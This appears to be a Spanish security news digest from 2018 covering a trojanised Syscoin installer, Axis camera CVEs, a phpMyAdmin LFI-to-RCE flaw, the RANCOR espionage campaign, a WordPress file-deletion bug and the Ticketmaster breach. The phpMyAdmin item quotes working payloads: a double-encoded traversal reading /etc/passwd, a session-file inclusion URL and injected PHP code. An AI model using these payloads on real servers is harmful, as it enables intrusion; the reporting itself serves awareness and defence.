Tras analizar el instalador descubrieron que contenía código malicioso que «dropeaba» el archivo «re.exe» en la carpeta «C:\Users\user\AppData\Local\Temp», un troyano con funcionalidades de keylogger capaz de robar contraseñas y los «wallets» de los usuarios:

https://www.virustotal.com/#/file/b105d2db66865200d1b235c931026bf44428eb7327393bf76fdd4e96f1c622a1/detection

El ataque ha afectado a la capitalización del mercado que ha pasado de los 210 dólares a los 120 aproximadamente.

El instalador fraudulento fue subido a través de una cuenta comprometida de Github y afectó a la versión 3.0.4.1 del instalador.

El troyano sólo afecta a usuarios de Windows y los binarios ya se encuentran sustituidos por sus versiones legítimas.

Los usuarios de Windows que descargaron el instalador de Syscoin entre los días 9 y 13 de junio deberían eliminar cuanto antes el troyano, cambiar todas sus contraseñas y transferir todos sus activos a una cartera segura.

Más información:

 

Security Notice for Windows based installers:

https://github.com/syscoin/syscoin/wiki/Security-Notice-for-Windows-based-installers

Casi 400 modelos de cámaras Axis expuestos a ataques remotos

Se han descubierto 7 vulnerabilidades que afectan a 390 modelos diferentes de cámaras de la marca, que permitirían acceder sin credenciales, escalar privilegios y ejecutar comandos arbitrarios

Las vulnerabilidades han sido descubiertas por la empresa de seguridad VDOO, en un proyecto interno enfocado a la seguridad de cámaras IP. Éstas son:

• CVE-2018-10658:bloqueo del proceso ‘/bin/ssid’.
• CVE-2018-10659: bloqueo del proceso ‘/bin/ssid’.
• CVE-2018-10660: inyección de comandos shell.
• CVE-2018-10661: salto del proceso de autenticación
• CVE-2018-10662: elevación de permisos usando funcionalidad ‘.srv’de dbus.
• CVE-2018-10663: lectura fuera del buffer en proceso ‘/bin/ssid’.
• CVE-2018-10664: bloqueo del proceso httpd.

De estas vulnerabilidades, las catalogadas con los identificadores CVE-2018-10661, CVE-2018-10662 y CVE-2018-10660 permiten en su conjunto tomar el control total de las cámaras por el atacante sin la necesidad de autenticación. La empresa de seguridad ha puesto algunos ejemplos de las acciones que podrían realizarse:

• Acceder a la transmisión de vídeo.
• Bloquear la transmisión de vídeo.
• Tomar el control de la cámara para activarla/desactivarla o rotarla.
• Añadir la cámara a una botnet.
• Alterar o cambiar el firmware de la cámara.
• Utilizar la cámara para infiltrarse en la red.
• Inutilizar la cámara.
• Emplear la cámara para otros ataques, como DDoS o minería de bitcoin.

Las otras vulnerabilidades descritas, con los identificadores CVE-2018-10658, CVE-2018-10659 y CVE-2018-10664, permitirían afectar al funcionamiento de la cámara, sin que se requiera autenticación para ninguna de ellas. Finalmente, la vulnerabilidad CVE-2018-10663 permite la revelación de información sin autenticación.

La empresa que ha descubierto las vulnerabilidades asegura que no hay pruebas de que haya habido explotación, recomendando a todos los usuarios afectados actualizar de inmediato. Axis ha liberado un listadode los modelos afectados.

Las vulnerabilidades en dispositivos IoT se encuentran a la orden del día, evidenciando la necesidad de preocuparse por la seguridad de estos dispositivos y mantenerlos actualizados. No sólo es importante por la posible pérdida de privacidad (como en este caso acceder al streaming de vídeo) sino también porque permiten acceder al resto de la red para vulnerar otros dispositivos.

 

Más información:

 

VDOO Discovers Significant Vulnerabilities in Axis Cameras:
https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/Affected Product List:
https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf

Vulnerabilidad en PhpMyAdmin 4.8.x permite ejecución remota de código

La vulnerabilidad, la cual requiere encontrarse autenticado, es posible debido a un fallo de «Inclusión de fichero Local» (Local File Inclusion, LFI)

El equipo de seguridad ChaMD5 ha encontrado una vulnerabilidaddel tipo «Inclusión de Fichero Local» (Local File Inclusion, LFI) que permitiría la ejecución de código remoto (Remote Code Execution, RCE) en la versión 4.8.1 de PhpMyAdmin, una conocida aplicación web que permite trabajar con bases de datos MySQL del servidor.

La vulnerabilidad se encuentra en la función ‘checkPageValidity’, del fichero ‘/libraries/classes/Core.php’de PhpMyAdmin, la cual se encarga de comprobar que el fichero a cargar usando el parámetro ‘target’ de ‘index.php’es válido. Mediante una doble codificación, es posible saltar la restricción para cargar un archivo local arbitrario. Un ejemplo sería: ‘/index.php?target=db_sql.php%253f/etc/passwd’.

Además, para conseguir la ejecución remota de código, puede aprovecharse que PhpMyAdmin almacena en ficheros de sesión las sentencias SQL introducidas en su interfaz. Así pues, introduciendo una sentencia como «select ‘<?php phpinfo();exit;?>'», y obteniendo el id de sesión gracias a la cookie ‘phpMyAdmin’, puede ejecutarse código PHP arbitrario, el cual podría llamar a comandos del sistema. Un ejemplo completo sería el siguiente:

‘index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_d41d8cd98f00b204e9800998ecf8427e’

A día de hoy no se encuentra disponible una versión de PhpMyAdmin que solucione el fallo. Aunque se requiera estar autenticado para la explotación de esta vulnerabilidad, el uso de credenciales por defecto, fuerza bruta u otra vulnerabilidad que permita acceder sin credenciales, podrían permitir el control de la máquina debido a este fallo.

Para evitar la explotación de vulnerabilidades como esta, es importante restringir el acceso a herramientas de administración. Una posible solución es limitar la conexión a IPs autorizadas, o el uso de autenticación Basic Authcon una conexión HTTPS.

Más información:

 

phpMyAdmin 4.8.x LFI to RCE (Authorization Required):
https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

Plaintee y DDKong malware usado para el ciberespionaje de entidades asiáticas

Se ha descubierto una campaña de ataques de espionaje dirigidos a entidades del sudeste asiático utilizando malware.

Recientemente se ha descubierto una campaña de ciberespionaje que está asociada al grupo detrás del troyano KHRAT y ha estado afectando a los países del sudeste asiático.
El grupo denominado RANCOR usa dos familias de malware ‘PLAINTEE’y ‘DDKONG’.Los investigadores habían monitorizado la infraestructura del ‘C&C’del troyano ‘KHRAT’ donde identificaron múltiples variantes de este malware.

Más información:

 

Fuente:

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Vulnerabilidad en WordPress permite a un atacante obtener control total sobre el sitio web en segundos

Un fallo en una de las funciones principales permite borrar cualquier archivo del servidor

La vulnerabilidad descubierta por RIPS Technologiespermite a un usuario con pocos privilegios secuestrar todo el sitio web y ejecutar código arbitrario en el servidor.

El equipo de seguridad de WordPress fue informado del fallo hace 7 meses, pero no se corrigió y afecta a todas las versiones, incluida la actual.

La vulnerabilidad reside en una de las funciones de WordPressque se ejecuta en segundo plano cuando un usuario elimina permanentemente la miniatura de una imagen cargada. Esta acción acepta entradas de usuarios no optimizadas, que permiten a un usuario con privilegios limitados eliminar cualquier archivo del alojamiento web.

El único requisito para explotar el fallo es tener al menos una cuenta de autor, lo cuál reduce la gravedad del problema hasta cierto punto.

Eliminando por ejemplo el archivo wp-config.php, que es uno de los archivos más importantes en la instalación de WordPress, podría obligar a todo el sitio web a volver a la pantalla de instalación permitiendo al atacante reconfigurar el sitio web desde el navegador y tomar su control por completo.

Más información:

 

Artículo de RIPS Technologies:

https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ 

TicketMaster, un drama en tres actos (y un epílogo)

ACTO I: En el que TicketMaster alerta del ataque

El pasado día 28 de junio, TicketMaster alertaba a sus usuarios respecto a una fuga de información. Según explica en la página web que acompaña al aviso, el día 23 descubrieron que un producto del proveedor Inbenta (una empresa que provee chatbotsy que, por cierto, es de origen español) había sido comprometido. Al estar integrado en gran medida en el sitio web de TicketMaster, la información personal y de pago había podido ser accedida por un actor malicioso desconocido.

La primera reacción de TicketMaster ante esto fue desactivar todos los productos de Inbenta en todas las plataformas.

ACTO II: En el que Inbenta responde a las acusaciones

Inbenta, por su parte, ha dado algo más de detalle sobre el ataque en su propia nota de prensa. Un fichero JavaScript, creado específicamente para cubrir las necesidades de TicketMaster, ha sido el responsable del robo de credenciales.

Acusan directamente a TicketMaster de haber integrado el fichero en su plataforma sin su aprobación, ya que de haberlo sabido habrían avisado del peligro que conlleva. Sin embargo, solo una frase después reconocen que el atacante fue capaz de encontrar y modificar este fichero en su infraestructura.

Según las declaraciones del CEO de Inbenta, Jordi Torras, a ZDNet a través de email, el atacante pudo acceder a los servidores frontendde Inbenta a través de la explotación de varias vulnerabilidades, y abusar de la característica de subida de ficheros a la plataforma para sustituir el fichero por uno con el código malicioso.

ACTO III: En el que descubrimos que Monzo ya habían avisado

Monzo es un banco que opera a través de Internet bastante popular en Reino Unido. A partir del día 6 de abril, empezó a ver como las quejas desde estos países por fraude en tarjetas de crédito se multiplicaban hasta llegar a tener que reemplazar 6000 tarjetas de forma preventiva.

Cruzando los datos de los clientes afectados por fraude con sus transacciones, se dieron cuenta que el 70% de últimos fraudes afectaban a clientes que usaban TicketMaster. Lo raro es que estos representaban solo un 0,8% de su base de clientes, un porcentaje demasiado bajo para tanto fraude. Algo ocurría. El 12 de abril, miembros del equipo de seguridad de TicketMaster visitaron las oficinas de Monzo para estudiar el caso y afirmaron en que se iba a investigar internamente.

Más información:

 

INFORMATION ABOUT DATA SECURITY INCIDENT BY THIRD-PARTY SUPPLIER:
https://security.ticketmaster.co.uk/